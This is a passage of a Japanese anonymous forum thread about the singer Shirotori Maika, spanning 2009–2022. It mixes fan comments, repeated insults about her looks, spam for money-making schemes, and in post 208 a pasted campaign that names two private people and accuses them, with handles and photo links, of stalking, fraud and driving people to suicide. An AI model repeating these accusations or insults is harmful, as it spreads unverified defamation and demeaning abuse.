172 :名無しの歌姫:2009/08/04(火) 17:55:21 ID:GgxrXyB30.net
個人サイトだけどけっこう高評価

http://badtzmaru.blog34.fc2.com/blog-entry-637.html#more

173 :名無しの歌姫:2009/08/14(金) 01:54:36 ID:q2PCbNL70.net
顔に対するコンプレックスが「oh,darling」て曲に表れてるきがする

顔のない男が汚い指で私を指差す・・・
私はあなたに背中をみせるけど顔はみせない・・・
絵の中の私を愛さないで、実物はそんなんじゃないわ・・・



174 :ゴメンネ:2009/08/21(金) 14:36:31 ID:iPh0CL9V0.net
今回アルバム買いましたが中古です(中古CD専門店 SONICよりインターネットで)

花園  785円
桃源郷 680円

両方共サンプル盤プロモーション用のシールが貼られてますが製品盤と変りません

175 :名無しの歌姫:2009/08/23(日) 12:18:21 ID:AMdPQ2y+O.net
ひでえスレタイ

176 :名無しの歌姫:2009/10/05(月) 02:30:54 ID:EweF6rSbO.net
スレタイワロタww
でもさ実は自分では美人…とまではいかないけど普通にイケてるって思ってるんじゃない?
CDジャケットに顔とか使いまくるし ホムペに 「よしっ!仕事に燃えるぞ〜いい女〜」とかな日記あったし まあツイストの歌にかけたつもりなだけかもわからんが日記には顔写もポツポツ貼られてたりしたし

面長なのと鼻下〜口元があれすぎてブスブスかかれてるが
目は二重で大きい 鼻は高い 輪郭もシュッとしてる 髪型も上手くセットしてある スタイルも170近くあってスラっとしている
母ちゃんに似てるが母ちゃんの若い頃よりは遥かに見れるし
多分そこそこモテるブスなんじゃないかな
まあここまで書いたのは要するにちょいブス専の俺的にはたまらんブスなんだわw


177 :名無しの歌姫:2009/11/14(土) 03:46:02 ID:Ekb9TCFyO.net
何気にトム・コインとかBob Ludwigがマスタリングしてんだな

178 :名無しの歌姫:2009/11/25(水) 10:31:51 ID:XTtil1CyO.net
http://www.youtube.com/watch?v=r5d03nfjy3g

これで知りました。いい曲ですね…

179 :名無しの歌姫:2009/11/25(水) 19:52:33 ID:EH1td/Z30.net
いくらなんでもこれにあてるのは楽曲に対する冒涜もいいとこだろ。


180 :名無しの歌姫:2010/05/18(火) 22:06:46 ID:16Ce+7ND0.net


181 :名無しの歌姫:2010/05/18(火) 22:12:59 ID:oq8blAWL0.net


182 :名無しの歌姫:2010/05/27(木) 19:20:25 ID:R24ijpXF0.net
>>178
今見て来たけど、結構歌の暗さと合ってて良かった。はまってたよ。

183 :名無しの歌姫:2010/05/27(木) 19:22:58 ID:R24ijpXF0.net
前に聞いた時より、より御母様に声が似て来ているような…。発声は違うが。
顔は関係なく、凄くいいなと思います。

184 :名無しの歌姫:2010/07/24(土) 01:21:41 ID:K827tycd0.net
才能ある人だと思う

185 :名無しの歌姫:2010/10/02(土) 17:48:42 ID:iDWEkKo/0.net
保守age

186 :名無し募集中。。。:2010/10/26(火) 10:31:54 ID:92Cz9PZU0.net
normal | list 2010-09-23 16:35:18
吉祥寺スターパインズカフェライブ決定!
11月2日(火)
吉祥寺Star Pine's Cafeで
白鳥マイカり2年ぶりのワンマンライブを行います!
11月でデビューから丸9周年にあたるということで、
新たな10年目を迎えるにあたっての総まとめ的ライブ!
是非とも見にいらして下さい!!!

**********


白鳥マイカ ワンマンLIVE
『Thank you!丸9!コンサート!〜丸9年目にこんにちは〜』

日にち:2010年11月2日火曜日


187 :名無しの歌姫:2011/07/18(月) 15:44:39.46 ID:DW+FVHlnO.net
ブス

188 :名無しの歌姫:2011/11/18(金) 17:32:20.23 ID:iPFAbuHrO.net
結婚したんだね。
おめでとう

189 :名無しの歌姫:2012/04/17(火) 22:59:27.68 ID:SY/DyHyV0.net
age


190 :名無しの歌姫:2012/06/16(土) 00:16:30.17 ID:7tgfLO3/0.net


191 :名無しの歌姫:2012/10/23(火) 14:28:01.69 ID:wis9k/1T0.net
割と最近ファンになりました
つっても1stアルバムしか聴いたこと無いので、いずれ他のも聴きたいと思います

妊娠おめでとう

192 :名無しの歌姫:2013/01/11(金) 07:03:47.98 ID:Ihfz0WCV0.net
ももいろクローバーより
Red Cloverの方がいいと思う

193 :名無しの歌姫:2013/01/19(土) 08:12:25.80 ID:veqeNayN0.net
出産おめでとう!!

194 :名無しの歌姫:2013/10/01(火) 23:29:46.93 ID:7B4tUC4M0.net
うん

195 :名無しの歌姫:2015/02/14(土) 08:59:40.89 ID:coL8s+cR0.net
もう活動してないのか?

196 :名無しの歌姫:2015/03/23(月) 21:10:33.44 ID:N1i6yfzj0.net
英美子はなぜ歯並び矯正させなかったのかしら?
マイカが売れないのはブサイクが原因よ?
沢尻エリカやmelody.の美人に提供した曲は大ヒットしたのに(笑)

197 :名無しの歌姫:2015/07/29(水) 17:17:42.04 ID:OLXdQjOy0.net
あげあげ

198 :名無しの歌姫:2015/09/05(土) 15:02:26.14 ID:qIR551bH0.net
繝繧ケ繝医☆縺セ繧

199 :名無しの歌姫:2016/07/21(木) 10:21:15.41 ID:g+LjGcMY0.net
ぶす

200 :名無しの歌姫:2016/10/29(土) 15:51:23.18 ID:WCK+0sAu0.net
保守

201 :名無しの歌姫:2017/03/20(月) 23:35:39.06 ID:9uMQS3Mw0.net
a

202 :名無しの歌姫:2017/09/17(日) 17:16:04.15 ID:HeIB9qgN0.net
a

203 :名無しの歌姫:2018/01/03(水) 01:27:06.52 ID:YXYlq2Lv0.net
邦楽もおもしろいけど、小遣い稼ぎの方法とか

グーグル検索⇒『増田のセンジョイウツツノ』

D7QYYX1OJP

204 :名無しの歌姫:2018/07/06(金) 03:24:59.74 ID:qJ8PDg2A0.net
すごくおもしろい嘘みたいに金の生る木を作れる方法
興味がある人はどうぞ
検索してみよう『ネットで稼ぐ方法 モニアレフヌノ』

YUN

205 :名無しの歌姫:2018/07/23(月) 16:36:18.13 ID:CsKhevCG0.net
誰でもできる稼ぐことができるホームページ
念のためにのせておきます
2chまとめで副業できる方法とは?さりげなく検索しちゃおう『立木のボボトイテテレ』

CLG

206 :名無しの歌姫:2019/12/22(日) 19:15:22.50 ID:PPxTZNK50.net
CLG

207 :名無しの歌姫:2020/03/21(土) 15:57:55 ID:KF9m9+R60.net
RRZ

208 :名無しの歌姫:2020/07/01(水) 15:26:01.22 ID:VaSL/+py0.net
【全スレ連絡 注意喚起 】 【拡.散.希.望 】 コピーリンク転載自由

◆ ◆ 東京の無名DJ ume-rock(ウメロック) は危険 ◆ ◆

練馬区、吉祥寺周辺をうろつくume-rock(ウメロック)は集団ストーカー 工作員
大量デマ中傷投稿でアーティスト、スタッフ、一般客を自殺に追い込むネット工作
次々に人を自殺泣き寝入りに追い込む殺人鬼
ゴミ漁りして個人情報収集やストーキングもやってる
女性に卑猥なスカトロ投稿嫌がらせをやる変質者
ご尊顔
https://m.imgur.com/a/zI7k2Vx https://imgur.com/a/F99kLvs
https://imgur.com/a/PqVobul https://imgur.com/a/VxbHog0
https://m.imgur.com/a/mtOdqaw https://m.imgur.com/a/0kcA5wo
https://m.imgur.com/a/svw522P
@ume_rock http://mobile.twitter.com/ume_rock
詳細は専用スレで↓ ウメロックの悪事を一挙大暴露!
http://medaka.5ch.net/test/read.cgi/4649/1591070603/l50
「 ume-rock 集団ストーカー 」で検索

◆ ◆ 札幌のライブハウス Sound Lab mole は危険 ◆ ◆

店長 の大嶋(おおしま)は集団ストーカー ネット工作員
客叩き、アーティスト、バンド潰し、自殺に追い込むネット工作
次々に人を自殺に追い込む殺人鬼
店長 の大嶋 ( おおしま)は詐欺師
配信ライブで卑怯にお金を巻き上げる ※ソースあり
http://otototabi.com/2020/shared/img/interview/manabu_02_06.jpg
@ohshima0040 http://mobile.twitter.com/ohshima0040
@soundlabmole http://mobile.twitter.com/soundlabmole
詳細は↓ 専用スレで 大嶋智洋の悪事を一挙大暴露!
http://medaka.5ch.net/test/read.cgi/4649/1590645255/l50 hkdod
「 Sound Lab mole 集団ストーカー 」で検索
(deleted an unsolicited ad)

209 :名無しの歌姫:2020/12/02(水) 20:06:04.88 ID:+5EYAl/R0.net
210

210 :名無しの歌姫:2020/12/03(木) 15:07:53.34 ID:zNur5mFt0.net
OEK

211 :名無しの歌姫:2021/02/27(土) 23:50:09.97 ID:TitV9cm10.net


212 :名無しの歌姫:2021/06/29(火) 15:22:19.44 ID:0OVwdb0D0.net
最近自身のYouTubeみるようになって、久しぶりにマイカさんの歌声聴きました。
CDもずっと出していないのかと思いきや、15周年シングルとベスト盤をご自分のサイトで販売されていたんですね。

213 :名無しの歌姫:2021/12/22(水) 18:36:59.34 ID:+2/DP8UZ0.net
214

214 :名無しの歌姫:2021/12/23(木) 13:47:31.77 ID:jfwDjLex0.net
vfsal

215 :名無しの歌姫:2022/01/29(土) 15:59:43.31 ID:QQ1fRJxb0.net
uuopt

総レス数 215
34 KB
掲示板に戻る 全部 前100 次100 最新50
read.cgi ver.24052200